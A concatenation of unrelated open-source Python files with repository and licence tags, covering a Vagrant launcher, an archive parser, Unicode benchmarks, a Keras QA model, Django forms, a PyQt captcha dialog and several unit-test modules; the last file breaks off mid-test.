from sys import argv, stdout, stderr, exit from subprocess import call, PIPE from os import path, chdir import optparse import time def run(): parser = optparse.OptionParser() parser.add_option("-d", "--directory", type="str", dest="directory", default=".", help="Specify the directory that contains the Vagrantfile (default: current directory)") options, _ = parser.parse_args(argv[1:]) directory = path.abspath(options.directory) if call(["which", "vagrant"], stdout=PIPE, stderr=PIPE) != 0: stderr.write("Vagrant not installed.\n") exit(1) if path.exists(directory): chdir(directory) else: stderr.write("Directory does not exist.\n") exit(1) if not path.exists(path.join(directory, "Vagrantfile")): stderr.write("Vagrantfile does not exist at '{}'.\n".format(directory)) exit(1) try: call(["vagrant", "up"]) stdout.write("Vagrant service ready\n") while True: time.sleep(1) except (KeyboardInterrupt, SystemExit): stdout.write("Shutting down vagrant...\n") returncode = call(["vagrant", "halt"]) if returncode != 0: subprocess.call(["vagrant", "halt", "--force"]) exit(0) if __name__=='__main__': run()
agpl-3.0
dannyboi104/SickRage
lib/hachoir_parser/archive/mozilla_ar.py
74
2405
"""MAR (Mozilla ARchive) parser Author: Robert Xiao Creation date: July 10, 2007 """ from hachoir_core.endian import BIG_ENDIAN from hachoir_core.field import (RootSeekableFieldSet, FieldSet, String, CString, UInt32, RawBytes) from hachoir_core.text_handler import displayHandler, filesizeHandler from hachoir_core.tools import humanUnixAttributes from hachoir_parser import HachoirParser class IndexEntry(FieldSet): def createFields(self): yield UInt32(self, "offset", "Offset in bytes relative to start of archive") yield filesizeHandler(UInt32(self, "length", "Length in bytes")) yield displayHandler(UInt32(self, "flags"), humanUnixAttributes) yield CString(self, "name", "Filename (byte array)") def createDescription(self): return 'File %s, Size %s, Mode %s'%( self["name"].display, self["length"].display, self["flags"].display) class MozillaArchive(HachoirParser, RootSeekableFieldSet): MAGIC = "MAR1" PARSER_TAGS = { "id": "mozilla_ar", "category": "archive", "file_ext": ("mar",), "min_size": (8+4+13)*8, # Header, Index Header, 1 Index Entry "magic": ((MAGIC, 0),), "description": "Mozilla Archive", } endian = BIG_ENDIAN def __init__(self, stream, **args): RootSeekableFieldSet.__init__(self, None, "root", stream, None, stream.askSize(self)) HachoirParser.__init__(self, stream, **args) def validate(self): if self.stream.readBytes(0, 4) != self.MAGIC: return "Invalid magic" return True def createFields(self): yield String(self, "magic", 4, "File signature (MAR1)", charset="ASCII") yield UInt32(self, "index_offset", "Offset to index relative to file start") self.seekByte(self["index_offset"].value, False) yield UInt32(self, "index_size", "size of index in bytes") current_index_size = 0 # bytes while current_index_size < self["index_size"].value: # plus 4 compensates for index_size self.seekByte(self["index_offset"].value + current_index_size + 4, False) entry = IndexEntry(self, "index_entry[]") yield entry current_index_size += entry.size // 8 self.seekByte(entry["offset"].value, False) yield RawBytes(self, "file[]", entry["length"].value)
gpl-3.0
meabsence/python-for-android
python3-alpha/python3-src/Tools/pybench/Unicode.py
92
11110
try: unicode except NameError: raise ImportError from pybench import Test class ConcatUnicode(Test): version = 2.0 operations = 10 * 5 rounds = 60000 def test(self): # Make sure the strings are *not* interned s = unicode(u''.join(map(str,range(100)))) t = unicode(u''.join(map(str,range(1,101)))) for i in range(self.rounds): t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s t + s def calibrate(self): s = unicode(u''.join(map(str,range(100)))) t = unicode(u''.join(map(str,range(1,101)))) for i in range(self.rounds): pass class CompareUnicode(Test): version = 2.0 operations = 10 * 5 rounds = 150000 def test(self): # Make sure the strings are *not* interned s = unicode(u''.join(map(str,range(10)))) t = unicode(u''.join(map(str,range(10))) + "abc") for i in range(self.rounds): t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s t < s t > s t == s t > s t < s def calibrate(self): s = unicode(u''.join(map(str,range(10)))) t = unicode(u''.join(map(str,range(10))) + "abc") for i in range(self.rounds): pass class CreateUnicodeWithConcat(Test): version = 2.0 operations = 10 * 5 rounds = 80000 def test(self): for i in range(self.rounds): s = u'om' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' s = s + u'xax' s = s + u'xbx' s = s + u'xcx' s = s + u'xdx' s = s + u'xex' def calibrate(self): for i in range(self.rounds): pass class UnicodeSlicing(Test): version = 2.0 operations = 5 * 7 rounds = 140000 def test(self): s = unicode(u''.join(map(str,range(100)))) for i in range(self.rounds): s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] s[50:] s[:25] s[50:55] s[-1:] s[:1] s[2:] s[11:-11] def calibrate(self): s = unicode(u''.join(map(str,range(100)))) for i in range(self.rounds): pass ### String methods class UnicodeMappings(Test): version = 2.0 operations = 3 * (5 + 4 + 2 + 1) rounds = 10000 def test(self): s = u''.join(map(unichr,range(20))) t = u''.join(map(unichr,range(100))) u = u''.join(map(unichr,range(500))) v = u''.join(map(unichr,range(1000))) for i in range(self.rounds): s.lower() s.lower() s.lower() s.lower() s.lower() s.upper() s.upper() s.upper() s.upper() s.upper() s.title() s.title() s.title() s.title() s.title() t.lower() t.lower() t.lower() t.lower() t.upper() t.upper() t.upper() t.upper() t.title() t.title() t.title() t.title() u.lower() u.lower() u.upper() u.upper() u.title() u.title() v.lower() v.upper() v.title() def calibrate(self): s = u''.join(map(unichr,range(20))) t = u''.join(map(unichr,range(100))) u = u''.join(map(unichr,range(500))) v = u''.join(map(unichr,range(1000))) for i in range(self.rounds): pass class UnicodePredicates(Test): version = 2.0 operations = 5 * 9 rounds = 120000 def test(self): data = (u'abc', u'123', u' ', u'\u1234\u2345\u3456', u'\uFFFF'*10) len_data = len(data) for i in range(self.rounds): s = data[i % len_data] s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() s.isalnum() s.isalpha() s.isdecimal() s.isdigit() s.islower() s.isnumeric() s.isspace() s.istitle() s.isupper() def calibrate(self): data = (u'abc', u'123', u' ', u'\u1234\u2345\u3456', u'\uFFFF'*10) len_data = len(data) for i in range(self.rounds): s = data[i % len_data] try: import unicodedata except ImportError: pass else: class UnicodeProperties(Test): version = 2.0 operations = 5 * 8 rounds = 100000 def test(self): data = (u'a', u'1', u' ', u'\u1234', u'\uFFFF') len_data = len(data) digit = unicodedata.digit numeric = unicodedata.numeric decimal = unicodedata.decimal category = unicodedata.category bidirectional = unicodedata.bidirectional decomposition = unicodedata.decomposition mirrored = unicodedata.mirrored combining = unicodedata.combining for i in range(self.rounds): c = data[i % len_data] digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) digit(c, None) numeric(c, None) decimal(c, None) category(c) bidirectional(c) decomposition(c) mirrored(c) combining(c) def calibrate(self): data = (u'a', u'1', u' ', u'\u1234', u'\uFFFF') len_data = len(data) digit = unicodedata.digit numeric = unicodedata.numeric decimal = unicodedata.decimal category = unicodedata.category bidirectional = unicodedata.bidirectional decomposition = unicodedata.decomposition mirrored = unicodedata.mirrored combining = unicodedata.combining for i in range(self.rounds): c = data[i % len_data]
apache-2.0
IgowWang/ML_python3
kerasgo/qa.py
2
4487
#!/usr/bin/env python # -*- coding: utf-8 -*- # author igor # Created by iFantastic on 16-6-3 import re import tarfile from functools import reduce import numpy as np import nltk from keras.preprocessing.sequence import pad_sequences from keras.layers.embeddings import Embedding from keras.layers.core import Dense, Merge from keras.layers import recurrent from keras.models import Sequential from keras.utils.visualize_util import plot np.random.seed(1337) DATA_PATH = '/data/task_qa.tar.gz' tar = tarfile.open(DATA_PATH) challenge = 'tasks_1-20_v1-2/en-10k/qa2_two-supporting-facts_{}.txt' def parse_stories(lines, only_supporting=False): data = [] story = [] for line in lines: line = line.decode() line = line.strip() nid, line = line.split(' ', 1) nid = int(nid) if nid == 1: story = [] if '\t' in line: q, a, supporting = line.split('\t') q = nltk.word_tokenize(q) substory = None if only_supporting: supporting = map(int, supporting.split()) substory = [story[i - 1] for i in supporting] else: substory = [x for x in story if x] data.append((substory, q, a)) story.append('') else: sent = nltk.word_tokenize(line) story.append(sent) return data def get_stories(f, only_supporting=False, max_length=50): data = parse_stories(f.readlines(), only_supporting=only_supporting) flatten = lambda data: reduce(lambda x, y: x + y, data) data = [(flatten(story), q, answer) for story, q, answer in data if max_length or len(flatten(story)) < max_length] return data def vectorize_stories(data, word2id, vocab_size, story_maxlen, query_maxlen): X = [] Xq = [] Y = [] for story, query, answer in data: x = [word2id[w] for w in story] xq = [word2id[w] for w in query] y = np.zeros(vocab_size) y[word2id[answer]] = 1 X.append(x) Xq.append(xq) Y.append(y) return pad_sequences(X, maxlen=story_maxlen), pad_sequences(Xq, maxlen=query_maxlen), np.array(Y) def main(): RNN = recurrent.GRU EMBED_HIDDEN_SIZE = 50 SENT_HIDDEN_SIZE = 100 QUERY_HIDDEN_SIZE = 100 BATCH_SIZE = 32 EPOCHS = 5 print('RNN / Embed / Sent / Query = {}, {}, {}, {}'.format(RNN, EMBED_HIDDEN_SIZE, SENT_HIDDEN_SIZE, QUERY_HIDDEN_SIZE)) train = get_stories(tar.extractfile(challenge.format('train'))) test = get_stories(tar.extractfile(challenge.format('test'))) vocab = sorted(reduce(lambda x, y: x | y, (set(story + q + [answer]) for story, q, answer in train + test))) vocab_size = len(vocab) + 1 word2id = dict((c, i + 1) for i, c in enumerate(vocab)) story_maxlen = max(map(len, (x for x, _, _ in train + test))) query_maxlen = max(map(len, (x for _, x, _ in train + test))) X, Xq, Y = vectorize_stories(train, word2id, vocab_size, story_maxlen, query_maxlen) tX, tXq, tY = vectorize_stories(test, word2id, vocab_size, story_maxlen, query_maxlen) print('vocab = {}'.format(vocab)) print('X.shape = {}'.format(X.shape)) print('Xq.shape = {}'.format(Xq.shape)) print('Y.shape = {}'.format(Y.shape)) print('story_maxlen, query_maxlen = {}, {}'.format(story_maxlen, query_maxlen)) print('Build model...') sentrnn = Sequential() sentrnn.add(Embedding(vocab_size, EMBED_HIDDEN_SIZE, input_length=story_maxlen)) sentrnn.add(RNN(SENT_HIDDEN_SIZE, return_sequences=False)) qrnn = Sequential() qrnn.add(Embedding(vocab_size, EMBED_HIDDEN_SIZE, input_length=query_maxlen)) qrnn.add(RNN(QUERY_HIDDEN_SIZE, return_sequences=False)) model = Sequential() model.add(Merge([sentrnn, qrnn], mode='concat')) model.add((Dense(vocab_size, activation='softmax'))) model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) # plot(model) print("Training") model.fit([X, Xq], Y, batch_size=BATCH_SIZE, nb_epoch=EPOCHS, validation_split=0.05, verbose=True) loss, acc = model.evaluate([tX, tXq], tY, batch_size=BATCH_SIZE) print('Test loss / test accuracy = {:.4f} / {:.4f}'.format(loss, acc)) if __name__ == '__main__': # data = get_stories(tar.extractfile(challenge.format('train'))) # print(data[0]) main()
gpl-3.0
jwiggins/scikit-image
skimage/transform/tests/test_pyramids.py
35
2302
from numpy.testing import assert_array_equal, assert_raises, run_module_suite from skimage import data from skimage.transform import pyramids image = data.astronaut() image_gray = image[..., 0] def test_pyramid_reduce_rgb(): rows, cols, dim = image.shape out = pyramids.pyramid_reduce(image, downscale=2) assert_array_equal(out.shape, (rows / 2, cols / 2, dim)) def test_pyramid_reduce_gray(): rows, cols = image_gray.shape out = pyramids.pyramid_reduce(image_gray, downscale=2) assert_array_equal(out.shape, (rows / 2, cols / 2)) def test_pyramid_expand_rgb(): rows, cols, dim = image.shape out = pyramids.pyramid_expand(image, upscale=2) assert_array_equal(out.shape, (rows * 2, cols * 2, dim)) def test_pyramid_expand_gray(): rows, cols = image_gray.shape out = pyramids.pyramid_expand(image_gray, upscale=2) assert_array_equal(out.shape, (rows * 2, cols * 2)) def test_build_gaussian_pyramid_rgb(): rows, cols, dim = image.shape pyramid = pyramids.pyramid_gaussian(image, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer, dim) assert_array_equal(out.shape, layer_shape) def test_build_gaussian_pyramid_gray(): rows, cols = image_gray.shape pyramid = pyramids.pyramid_gaussian(image_gray, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer) assert_array_equal(out.shape, layer_shape) def test_build_laplacian_pyramid_rgb(): rows, cols, dim = image.shape pyramid = pyramids.pyramid_laplacian(image, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer, dim) assert_array_equal(out.shape, layer_shape) def test_build_laplacian_pyramid_gray(): rows, cols = image_gray.shape pyramid = pyramids.pyramid_laplacian(image_gray, downscale=2) for layer, out in enumerate(pyramid): layer_shape = (rows / 2 ** layer, cols / 2 ** layer) assert_array_equal(out.shape, layer_shape) def test_check_factor(): assert_raises(ValueError, pyramids._check_factor, 0.99) assert_raises(ValueError, pyramids._check_factor, - 2) if __name__ == "__main__": run_module_suite()
bsd-3-clause
hqpr/findyour3d
findyour3d/company/forms.py
1
6270
from django import forms from .models import Company, SpecialOffer EXPEDITED_CHOICES = ( (0, 'No, we do not offer any expedited shipping options.'), (1, 'Yes we offer an expedited process for a fee.') ) class AddCompanyForm(forms.ModelForm): class Meta: model = Company fields = ['name', 'display_name', 'address_line_1', 'address_line_2', 'full_name', 'email', 'phone', 'website', 'ideal_customer', 'is_cad_assistance', 'budget', 'material', 'top_printing_processes', 'description', 'user'] widgets = { 'name': forms.TextInput(attrs={'class': 'form-control'}), 'display_name': forms.TextInput(attrs={'class': 'form-control'}), 'address_line_1': forms.TextInput(attrs={'class': 'form-control'}), 'address_line_2': forms.TextInput(attrs={'class': 'form-control'}), 'full_name': forms.TextInput(attrs={'class': 'form-control'}), 'email': forms.TextInput(attrs={'class': 'form-control'}), 'phone': forms.TextInput(attrs={'class': 'form-control'}), 'website': forms.TextInput(attrs={'class': 'form-control'}), 'ideal_customer': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'budget': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'material': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'top_printing_processes': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'description': forms.Textarea(attrs={'class': 'form-control', 'rows': 10}), 'quote_limit': forms.NumberInput(attrs={'class': 'form-control edited'}), 'user': forms.HiddenInput(), } def __init__(self, *args, **kwargs): self.user = None if 'user' in kwargs['initial']: self.user = kwargs['initial'].pop('user') super(AddCompanyForm, self).__init__(*args, **kwargs) self.fields['user'].initial = self.user self.fields['ideal_customer'].label = 'What is your company’s ideal customer that we should send to you?' self.fields['budget'].label = 'What is your ideal order cost/budget?' self.fields['top_printing_processes'].label = 'Printing Processes Available' self.fields['name'].label = 'Company Name' # self.fields['quote_limit'].required = False self.fields['display_name'].label = 'Company Display Name' self.fields['full_name'].label = "Company Contact's Full Name" self.fields['email'].label = "Company Contact's Email" class EditCompanyForm(forms.ModelForm): class Meta: model = Company fields = ['name', 'display_name', 'logo', 'address_line_1', 'address_line_2', 'full_name', 'email', 'phone', 'website', 'ideal_customer', 'is_cad_assistance', 'budget', 'material', 'top_printing_processes', 'description', 'user', 'is_expedited', 'shipping', 'quote_limit'] widgets = { 'name': forms.TextInput(attrs={'class': 'form-control'}), 'display_name': forms.TextInput(attrs={'class': 'form-control'}), 'logo': forms.ClearableFileInput(attrs={'class': 'form-control'}), 'address_line_1': forms.TextInput(attrs={'class': 'form-control'}), 'address_line_2': forms.TextInput(attrs={'class': 'form-control'}), 'full_name': forms.TextInput(attrs={'class': 'form-control'}), 'email': forms.TextInput(attrs={'class': 'form-control'}), 'phone': forms.TextInput(attrs={'class': 'form-control'}), 'website': forms.TextInput(attrs={'class': 'form-control'}), 'ideal_customer': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'budget': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'is_expedited': forms.Select(attrs={'class': 'form-control edited'}, choices=EXPEDITED_CHOICES), 'material': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'top_printing_processes': forms.SelectMultiple(attrs={'class': 'form-control edited big_height_block'}), 'description': forms.Textarea(attrs={'class': 'form-control', 'rows': 10}), 'shipping': forms.SelectMultiple(attrs={'class': 'form-control edited'}), 'quote_limit': forms.NumberInput(attrs={'class': 'form-control edited'}), 'user': forms.HiddenInput(), } def __init__(self, *args, **kwargs): self.user = None if 'user' in kwargs['initial']: self.user = kwargs['initial'].pop('user') super(EditCompanyForm, self).__init__(*args, **kwargs) self.fields['user'].initial = self.user self.fields['ideal_customer'].label = 'What is your company’s ideal customer that we should send to you?' self.fields['budget'].label = 'What is your ideal order cost/budget?' self.fields['is_expedited'].label = 'Do you offer an expedited manufacturing process?' self.fields['shipping'].label = 'Which of the following shipping options do you offer?' self.fields['quote_limit'].required = False self.fields['name'].label = 'Company Name' self.fields['display_name'].label = 'Company Display Name' self.fields['full_name'].label = "Company Contact's Full Name" self.fields['email'].label = "Company Contact's Email" class AddSpecialOfferForm(forms.ModelForm): class Meta: model = SpecialOffer fields = ('text', 'company') widgets = { 'text': forms.Textarea(attrs={'class': 'form-control', 'rows': 3, 'placeholder': 'eg: 25% off for next order!'}), 'company': forms.HiddenInput() } def __init__(self, *args, **kwargs): self.user = None if 'company' in kwargs['initial']: self.company = kwargs['initial'].pop('company') super(AddSpecialOfferForm, self).__init__(*args, **kwargs) self.fields['company'].initial = self.company
mit
seberm/Titulky.com-Downloader
prototypes/captcha-qt/captcha.py
1
2280
import sys from PyQt4 import QtGui, QtCore, QtNetwork from PyQt4.QtCore import SLOT, SIGNAL CAPTCHA_URL = 'http://www.titulky.com/captcha/captcha.php' MAX_CAPTCHA_LEN = 8 class CaptchaDialog(QtGui.QDialog): # Signal is emmited if captcha code is sucessfuly re-typed codeRead = QtCore.pyqtSignal() def __init__(self, parent = None, flags = 0): super(CaptchaDialog, self).__init__(parent) self.setWindowTitle('Re-type captcha') # Widgets self.lblCaptcha = QtGui.QLabel('Loading captcha image ...', self) self.lblCaptcha.setFixedSize(200, 70) self.btnReload = QtGui.QPushButton('Reload', self) self.connect(self.btnReload, SIGNAL("clicked()"), self.reloadCaptcha) self.btnSend = QtGui.QPushButton('Send', self) self.connect(self.btnSend, SIGNAL("clicked()"), self.sendCode) self.leCode = QtGui.QLineEdit(self) self.leCode.setFocus() self.leCode.setMaxLength(MAX_CAPTCHA_LEN) layout = QtGui.QGridLayout() layout.addWidget(self.lblCaptcha) layout.addWidget(self.btnReload) layout.addWidget(self.leCode) layout.addWidget(self.btnSend) self.setLayout(layout) # Load captcha into label self.manager = QtNetwork.QNetworkAccessManager(self) self.connect(self.manager, SIGNAL("finished(QNetworkReply*)"), self.managerFinished) self.reloadCaptcha() def managerFinished(self, reply): if reply.error() != QtNetwork.QNetworkReply.NoError: self.lblCaptcha.setText('Error in loading captcha image') print(reply.errorString()) return data = reply.readAll() pixmap = QtGui.QPixmap() pixmap.loadFromData(data) self.lblCaptcha.setPixmap(pixmap) def reloadCaptcha(self): url = QtCore.QUrl(CAPTCHA_URL) request = QtNetwork.QNetworkRequest(url) self.manager.get(request) def sendCode(self): self.leCode.setDisabled(True) self.captchaCode = self.leCode.text() # We just emit a signal self.codeRead.emit() #self.close() if __name__ == '__main__': app = QtGui.QApplication(sys.argv) sys.exit(CaptchaDialog().exec_())
gpl-3.0
CEG-FYP-OpenStack/scheduler
nova/tests/unit/pci/test_request.py
11
7404
# Copyright 2013 Intel Corporation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Tests for PCI request.""" from nova import exception from nova.pci import request from nova import test _fake_alias1 = """{ "name": "QuicAssist", "capability_type": "pci", "product_id": "4443", "vendor_id": "8086", "device_type": "type-PCI" }""" _fake_alias11 = """{ "name": "QuicAssist", "capability_type": "pci", "product_id": "4444", "vendor_id": "8086", "device_type": "type-PCI" }""" _fake_alias2 = """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "1111", "device_type": "N" }""" _fake_alias3 = """{ "name": "IntelNIC", "capability_type": "pci", "product_id": "1111", "vendor_id": "8086", "device_type": "type-PF" }""" class AliasTestCase(test.NoDBTestCase): def test_good_alias(self): self.flags(pci_alias=[_fake_alias1]) als = request._get_alias_from_config() self.assertIsInstance(als['QuicAssist'], list) expect_dict = { "capability_type": "pci", "product_id": "4443", "vendor_id": "8086", "dev_type": "type-PCI" } self.assertEqual(expect_dict, als['QuicAssist'][0]) def test_multispec_alias(self): self.flags(pci_alias=[_fake_alias1, _fake_alias11]) als = request._get_alias_from_config() self.assertIsInstance(als['QuicAssist'], list) expect_dict1 = { "capability_type": "pci", "product_id": "4443", "vendor_id": "8086", "dev_type": "type-PCI" } expect_dict2 = { "capability_type": "pci", "product_id": "4444", "vendor_id": "8086", "dev_type": "type-PCI" } self.assertEqual(expect_dict1, als['QuicAssist'][0]) self.assertEqual(expect_dict2, als['QuicAssist'][1]) def test_wrong_type_aliase(self): self.flags(pci_alias=[_fake_alias2]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_wrong_product_id_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "pci", "product_id": "g111", "vendor_id": "1111", "device_type": "NIC" }"""]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_wrong_vendor_id_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "0xg111", "device_type": "NIC" }"""]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_wrong_cap_type_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "usb", "product_id": "1111", "vendor_id": "8086", "device_type": "NIC" }"""]) self.assertRaises(exception.PciInvalidAlias, request._get_alias_from_config) def test_dup_aliase(self): self.flags(pci_alias=[ """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "8086", "device_type": "NIC" }""", """{ "name": "xxx", "capability_type": "pci", "product_id": "1111", "vendor_id": "8086", "device_type": "type-PCI" }"""]) self.assertRaises( exception.PciInvalidAlias, request._get_alias_from_config) def _verify_result(self, expected, real): exp_real = zip(expected, real) for exp, real in exp_real: self.assertEqual(exp['count'], real.count) self.assertEqual(exp['alias_name'], real.alias_name) self.assertEqual(exp['spec'], real.spec) def test_aliase_2_request(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) expect_request = [ {'count': 3, 'spec': [{'vendor_id': '8086', 'product_id': '4443', 'dev_type': 'type-PCI', 'capability_type': 'pci'}], 'alias_name': 'QuicAssist'}, {'count': 1, 'spec': [{'vendor_id': '8086', 'product_id': '1111', 'dev_type': "type-PF", 'capability_type': 'pci'}], 'alias_name': 'IntelNIC'}, ] requests = request._translate_alias_to_requests( "QuicAssist : 3, IntelNIC: 1") self.assertEqual(set([p['count'] for p in requests]), set([1, 3])) self._verify_result(expect_request, requests) def test_aliase_2_request_invalid(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) self.assertRaises(exception.PciRequestAliasNotDefined, request._translate_alias_to_requests, "QuicAssistX : 3") def test_get_pci_requests_from_flavor(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) expect_request = [ {'count': 3, 'spec': [{'vendor_id': '8086', 'product_id': '4443', 'dev_type': "type-PCI", 'capability_type': 'pci'}], 'alias_name': 'QuicAssist'}, {'count': 1, 'spec': [{'vendor_id': '8086', 'product_id': '1111', 'dev_type': "type-PF", 'capability_type': 'pci'}], 'alias_name': 'IntelNIC'}, ] flavor = {'extra_specs': {"pci_passthrough:alias": "QuicAssist:3, IntelNIC: 1"}} requests = request.get_pci_requests_from_flavor(flavor) self.assertEqual(set([1, 3]), set([p.count for p in requests.requests])) self._verify_result(expect_request, requests.requests) def test_get_pci_requests_from_flavor_no_extra_spec(self): self.flags(pci_alias=[_fake_alias1, _fake_alias3]) flavor = {} requests = request.get_pci_requests_from_flavor(flavor) self.assertEqual([], requests.requests)
apache-2.0
hainn8x/gnuradio
gr-blocks/python/blocks/qa_multiply_matrix_ff.py
19
4796
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2014 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # import time import numpy import os import pmt from gnuradio import gr, gr_unittest from gnuradio import blocks class test_multiply_matrix_ff (gr_unittest.TestCase): def setUp (self): self.tb = gr.top_block () self.multiplier = None def tearDown (self): self.tb = None self.multiplier = None def run_once(self, X_in, A, tpp=gr.TPP_DONT, A2=None, tags=None, msg_A=None): """ Run the test for given input-, output- and matrix values. Every row from X_in is considered an input signal on a port. """ X_in = numpy.matrix(X_in) A_matrix = numpy.matrix(A) (N, M) = A_matrix.shape self.assertTrue(N == X_in.shape[0]) # Calc expected Y_out_exp = numpy.matrix(numpy.zeros((M, X_in.shape[1]))) self.multiplier = blocks.multiply_matrix_ff(A, tpp) if A2 is not None: self.multiplier.set_A(A2) A = A2 A_matrix = numpy.matrix(A) for i in xrange(N): if tags is None: these_tags = () else: these_tags = (tags[i],) self.tb.connect(blocks.vector_source_f(X_in[i].tolist()[0], tags=these_tags), (self.multiplier, i)) sinks = [] for i in xrange(M): sinks.append(blocks.vector_sink_f()) self.tb.connect((self.multiplier, i), sinks[i]) # Run and check self.tb.run() for i in xrange(X_in.shape[1]): Y_out_exp[:,i] = A_matrix * X_in[:,i] Y_out = [list(x.data()) for x in sinks] if tags is not None: self.the_tags = [] for i in xrange(M): self.the_tags.append(sinks[i].tags()) self.assertEqual(list(Y_out), Y_out_exp.tolist()) def test_001_t (self): """ Simplest possible check: N==M, unit matrix """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A = ( (1, 0), (0, 1), ) self.run_once(X_in, A) def test_002_t (self): """ Switch check: N==M, flipped unit matrix """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A = ( (0, 1), (1, 0), ) self.run_once(X_in, A) def test_003_t (self): """ Average """ X_in = ( (1, 1, 1, 1), (2, 2, 2, 2), ) A = ( (0.5, 0.5), (0.5, 0.5), ) self.run_once(X_in, A) def test_004_t (self): """ Set """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A1 = ( (1, 0), (0, 1), ) A2 = ( (0, 1), (1, 0), ) self.run_once(X_in, A1, A2=A2) def test_005_t (self): """ Tags """ X_in = ( (1, 2, 3, 4), (5, 6, 7, 8), ) A = ( (0, 1), # Flip them round (1, 0), ) tag1 = gr.tag_t() tag1.offset = 0 tag1.key = pmt.intern("in1") tag1.value = pmt.PMT_T tag2 = gr.tag_t() tag2.offset = 0 tag2.key = pmt.intern("in2") tag2.value = pmt.PMT_T self.run_once(X_in, A, tpp=999, tags=(tag1, tag2)) self.assertTrue(pmt.equal(tag1.key, self.the_tags[1][0].key)) self.assertTrue(pmt.equal(tag2.key, self.the_tags[0][0].key)) #def test_006_t (self): #""" Message passing """ #X_in = ( #(1, 2, 3, 4), #(5, 6, 7, 8), #) #A1 = ( #(1, 0), #(0, 1), #) #msg_A = ( #(0, 1), #(1, 0), #) #self.run_once(X_in, 